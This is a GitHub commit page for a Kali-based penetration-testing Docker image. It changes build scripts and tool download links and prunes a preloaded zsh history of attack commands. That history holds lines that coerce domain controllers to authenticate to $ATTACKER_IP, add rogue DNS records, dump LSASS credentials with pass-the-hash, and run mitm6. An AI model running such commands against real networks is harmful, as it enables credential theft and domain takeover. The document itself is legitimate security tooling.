Skip to content

Commit

Permalink
cleaned up history, renamed home script (#21)
Browse files Browse the repository at this point in the history
  • Loading branch information
alexrf45 authored Sep 1, 2024
1 parent 64971d0 commit b007680
Show file tree
Hide file tree
Showing 9 changed files with 32 additions and 124 deletions.
6 changes: 3 additions & 3 deletions Dockerfile
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,6 @@ FROM kalilinux/kali-rolling:latest
LABEL "project"="aegis"
LABEL "author"="fr3d"
LABEL "version"="v1.4.2"
LABEL "environment"="dev"

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ="America/New_York"
Expand Down Expand Up @@ -32,11 +31,12 @@ RUN /tmp/sources/0-base.sh

RUN /tmp/sources/1-tools.sh

RUN /tmp/sources/2-tools.sh
#uncomment for bug bounty usage
#RUN /tmp/sources/2-tools.sh

COPY resources /home/kali/resources/

RUN sudo chown -R kali:kali /home/kali/resources && /tmp/sources/4-home.sh
RUN sudo chown -R kali:kali /home/kali/resources && /tmp/sources/3-home.sh

RUN sudo rm -rf /tmp/sources && sudo rm -rf /home/kali/resources

Expand Down
21 changes: 13 additions & 8 deletions deploy.sh
Original file line number Diff line number Diff line change
@@ -1,24 +1,29 @@
#!/bin/bash

# for deploying aegis in bash. for zsh, comment out the bash commands and uncomment the zsh lines

set -e

if command -v gum >/dev/null 2>&1; then
echo -e "Gum is installed"
echo -e "Gum is installed"
elif [[ "$OSTYPE" == "linux-gnu" ]]; then
#sudo mkdir -p /etc/apt/keyrings &&
curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg
echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" >/dev/null 2>&1 | sudo tee /etc/apt/sources.list.d/charm.list
sudo apt update && sudo apt install gum
#sudo mkdir -p /etc/apt/keyrings &&
curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg
echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" >/dev/null 2>&1 | sudo tee /etc/apt/sources.list.d/charm.list
sudo apt update && sudo apt install gum lolcat figlet
else
echo "Please ensure Gum is installed via your OS package manager"
echo "Please ensure Gum is installed via your OS package manager"
fi

echo -e "pulling image now..."

docker pull fonalex45/aegis:latest

cp bash/aegis $HOME/.local/.
cp script/aegis $HOME/.local/bin/.

echo 'source "$HOME/.local/bin/aegis"' >>.bashrc

echo 'source "$HOME/.local/aegis"' >>.bashrc
# echo 'source "$HOME/.local/bin/aegis"' >>.zshrc

. ~/.bashrc
# . ~/.zshrc
7 changes: 4 additions & 3 deletions resources/zsh/.zshrc
Original file line number Diff line number Diff line change
Expand Up @@ -27,7 +27,6 @@ fpath=(/tmp/zsh-completions/src $fpath)

plugins=(
git
docker
zsh-autosuggestions
zsh-syntax-highlighting
)
Expand All @@ -37,7 +36,9 @@ source $HOME/.oh-my-zsh/oh-my-zsh.sh
#displays saying in every new prompt
source <(fzf --zsh)

eval "$(starship init zsh)"

#persistant ssh agent
eval $(ssh-agent) &> /dev/null

#starship prompt
eval "$(starship init zsh)"

23 changes: 5 additions & 18 deletions resources/zsh/history
Original file line number Diff line number Diff line change
Expand Up @@ -73,12 +73,6 @@ dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET"
dfscoerce.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$ATTACKER_IP" "$DC_HOST"
dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt
dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action add --data "$ATTACKER_IP" "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" --record '*' --action query "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
dnstool.py -u "$DOMAIN"\\"$USER" -p "$PASSWORD" -r "EXEGOL-01.$DOMAIN" -d 192.168.56.1 --action query "$DC_HOST"
dnstool.py -u "$DOMAIN"\\'SV01$' -p "ffffffffffffffffffffffffffffffff":"$NT_HASH" -r "EXEGOL-01.$DOMAIN" -d "$ATTACKER_IP" --action add "$DC_HOST"
echo "http://$TARGET/" | hakrawler -d 10
enum4linux -A "$IP"
enum4linux-ng -A "$TARGET"
enum4linux-ng -A -u "$DOMAIN"/"$USER" -p "$PASSWORD" "$DC_HOST"
Expand All @@ -93,17 +87,11 @@ export NAME=
export TARGET=
export USER=
fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt file.zip
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/common.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/api.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/dir-list.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/raft-small.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/api-wild.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/fuzz-1.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc all -w $HOME/.wordlists/LFI.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -ac -mc 200,503,500,400 -w $HOME/.wordlists/SQL.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -H "Host:FUZZ.$DOMAIN" -mc 200,403 -w $HOME/.wordlists/dns.txt -u http://$DOMAIN/
ffuf -c -t 5 -rate 30 -p 0.2 -H "User: $CTF_HEADER" -H "User-Agent: $AGENT" -H "Host:FUZZ.$DOMAIN" -mc 200,403 -w $HOME/.wordlists/dns-1.txt -u http://$DOMAIN/
ffuf -request REQUESTFILE -request-proto http -H "User: $CTF_HEADER" -w PATH/TO/WORDLIST -fs 0 -c
ffuf -c -t 5 -rate 20 -p 0.2 -H "User-Agent: $AGENT" -ac -mc all -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 20 -p 0.2 -H "User-Agent: $AGENT" -ac -mc all -w /usr/share/seclists/Discovery/Web-Content/api/api-seen-in-wild.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -H "Host:FUZZ.$DOMAIN" -mc 200,403,401 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$DOMAIN/
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -H "Host:FUZZ.$DOMAIN" -mc 200,403,401 -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -u http://$DOMAIN/
ffuf -request REQUESTFILE -request-proto http -w PATH/TO/WORDLIST -fs 0 -c
find DIR -type f -newermt YYYY-MM-DD ! -newermt YYYY-MM-DD > /dev/null
gMSADumper.py -d "$DOMAIN" -l "$DC_HOST" -u "$USER" -p "$PASSWORD"
getST.py -k -no-pass -spn host/"$DC_HOST" "$DOMAIN"/"$USER"
Expand Down Expand Up @@ -147,7 +135,6 @@ logfile $TARGET
lookupsid.py -hashes :"$NT_HASH" "$DOMAIN"/Administrator@"$DC_HOST" 0
lsassy -v -d "$DOMAIN" -u "$USER" -p "$PASSWORD" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
lsassy -v -u "$USER" -H "$NT_HASH" -K lsass_loot -o lsass_creds.txt 192.168.56.0/24
maigret "username"
masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24
masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24
mitm6 --interface eth0
Expand Down
29 changes: 0 additions & 29 deletions script/deploy.sh

This file was deleted.

6 changes: 3 additions & 3 deletions sources/0-base.sh
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
base() {
sudo apt-get install -y \
wget curl man git lolcat \
figlet tmux tree mousepad \
figlet tmux mousepad \
hexcurse file ruby ruby-dev \
vim nano p7zip-full kali-themes \
djvulibre-bin python3-pip \
Expand All @@ -25,7 +25,7 @@ network() {
snmp-mibs-downloader iputils-ping \
iproute2 proxychains \
sendmail ltrace \
raven faketime mitmproxy \
raven mitmproxy \
netexec
}

Expand All @@ -42,7 +42,7 @@ osint_tools() {
csvtool vinetto \
sqlitebrowser exiflooter \
h8mail \
sn0int cewl seclists sploitscan
sn0int cewl seclists
}

base
Expand Down
8 changes: 4 additions & 4 deletions sources/1-tools.sh
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@ web() {
}

web_server() {
wget "https://github.com/svenstaro/miniserve/releases/download/v0.26.0/miniserve-0.26.0-x86_64-unknown-linux-gnu" -q \
wget "https://github.com/svenstaro/miniserve/releases/download/v0.26.0/miniserve-0.27.1-x86_64-unknown-linux-gnu" -q \
-O miniserve && chmod +x ./miniserve && mv ./miniserve $HOME/.local/bin/miniserve
}

Expand Down Expand Up @@ -46,10 +46,10 @@ active_directory() {
pivot() {
cd $HOME/.tools/ &&
wget -q -O chisel.gz \
"https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz" &&
"https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz" &&
gunzip chisel.gz &&
wget -q -O win-chisel.gz \
"https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz" &&
"https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_windows_amd64.gz" &&
gunzip win-chisel.gz
}

Expand All @@ -58,7 +58,7 @@ privesc() {
wget -q -O linpeas \
"https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh" &&
wget -q -O winpeas.exe \
"https://github.com/peass-ng/PEASS-ng/releases/download/20240602-829055f0/winPEASx64_ofs.exe" &&
"https://github.com/peass-ng/PEASS-ng/releases/download/20240901-df0685e9/winPEASx64_ofs.exe" &&
wget -q -O pspys \
"https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64s" &&
wget -q -O pspy \
Expand Down
File renamed without changes.
56 changes: 0 additions & 56 deletions sources/kali.sh

This file was deleted.

0 comments on commit b007680

Please sign in to comment.